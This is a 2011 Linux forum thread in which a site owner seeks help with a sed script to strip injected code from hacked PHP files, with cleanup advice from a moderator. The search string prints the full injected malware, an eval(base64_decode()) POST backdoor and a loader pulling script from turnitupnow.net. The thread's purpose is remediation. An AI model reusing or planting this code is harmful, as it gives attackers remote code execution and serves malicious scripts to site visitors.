LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   Could you help me get a script working? (https://www.linuxquestions.org/questions/linux-newbie-8/could-you-help-me-get-a-script-working-912989/)

seabro 11-11-2011 05:46 AM
Could you help me get a script working?
 
Hi all,

I had my website hacked and thousands of files have a malicious script added inside PHP files.

I have tried to remove the code using a script I located online but it fails.

I think the problem is due to use of special characters in the string I am searching for.

Here it is, if you could help me make it work I would be very grateful.


# ************************************************** ***************************************
# find_and_replace_in_files.sh
# This script does a recursive, case sensitive directory search and replace of files
# To make a case insensitive search replace, use the -i switch in the grep call
# uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself!
# ************************************************** ***************************************
!/bin/bash
# **************** Change Variables Here ************
startdirectory="/path/to/public_html/"
searchterm="global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }"
replaceterm=""
# ************************************************** ********

echo "******************************************"
echo "* Search and Replace in Files Version .1 *"
echo "******************************************"

for file in $(grep -l -R $searchterm $startdirectory)
do
sed -e "s/$searchterm/$replaceterm/ig" $file > /tmp/tempfile.tmp
mv /tmp/tempfile.tmp $file
echo "Modified: " $file
done

echo " *** Yay! All Done! *** "



Many thanks,
sean

unSpawn 11-11-2011 07:01 AM
Quote:
Originally Posted by seabro (Post 4521426)
I had my website hacked
I'm sorry to hear that.


Quote:
Originally Posted by seabro (Post 4521426)
thousands of files have a malicious script added inside PHP files. I have tried to remove the code
I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing lame password) or how the abuse else could have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinkng about trying to revert back changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".


Quote:
Originally Posted by seabro (Post 4521426)
I think the problem is due to use of special characters in the string I am searching for.
While we can't have members post malicious code here but I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.

seabro 11-11-2011 07:14 AM
Quote:
Originally Posted by unSpawn (Post 4521465)
I'm sorry to hear that.



I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing lame password) or how the abuse else could have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinkng about trying to revert back changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".



While we can't have members post malicious code here but I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.

Hi,

The problem was with an old piece of gallery software I no longer use. It has since been removed.

The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess.

The problem has been plugged, I just need to clean my .php files now.

Thanks,
Seabro

unSpawn 11-11-2011 07:26 AM
Quote:
Originally Posted by seabro (Post 4521474)
The problem was with an old piece of gallery software I no longer use. It has since been removed.
Good, good.


Quote:
Originally Posted by seabro (Post 4521474)
The code is shown in my original post
No, I meant the code that latched itself onto your PHP files. Although the "for" loop part could use some work as there's no need for temp files or replacement string and a "while" loop works better if there's any spaces in file names:
Code:
grep -l -R "$searchterm"  "$startdirectory" 2>/dev/null| while read ITEM; do sed -i "s|$searchterm||ig" "${ITEM}"; done

indyloft 03-25-2012 09:04 PM
I just encountered Seabro's issue and manage to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..

seabro 03-26-2012 03:22 AM
hey indyloft,

sorry to hear of your problem.

Its been a while since this happened to me but I believe I ended up using 'sed'

Check it out, it can run through a load of files and modify the contents. I used it simple to remove the unwanted code. They is probably another way which is much better but 'sed' worked for me.

Good luck.

seabro


All times are GMT -5. The time now is 12:25 AM.